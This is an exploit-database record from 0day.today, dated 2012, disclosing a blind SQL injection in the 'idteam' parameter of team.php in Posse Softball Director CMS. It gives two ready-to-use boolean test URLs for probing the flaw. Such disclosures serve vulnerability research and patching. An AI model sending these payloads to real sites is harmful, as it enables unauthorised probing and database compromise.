Posse Softball Director CMS (team.php) Blind SQL Injection Vulnerability

2012-01-04T00:00:00
ID 1337DAY-ID-17340
Type zdt
Reporter Easy Laster
Modified 2012-01-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            .-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
 ~ Posse Softball Director CMS Blind SQL Injection Vulnerability team.php  ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
[+] Autor: easy laster
[+] Vulnerabilities [Blind SQL Injection ]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.
   
[+] Vulnerability
   
    team.php?idteam=
       
[+] Exploitable
   
    http://[host]/[path]/team.php?idteam=1+and+1=1--+ #true
    http://[host]/[path]/team.php?idteam=1+and+1=2--+ #false



#  0day.today [2018-03-03]  #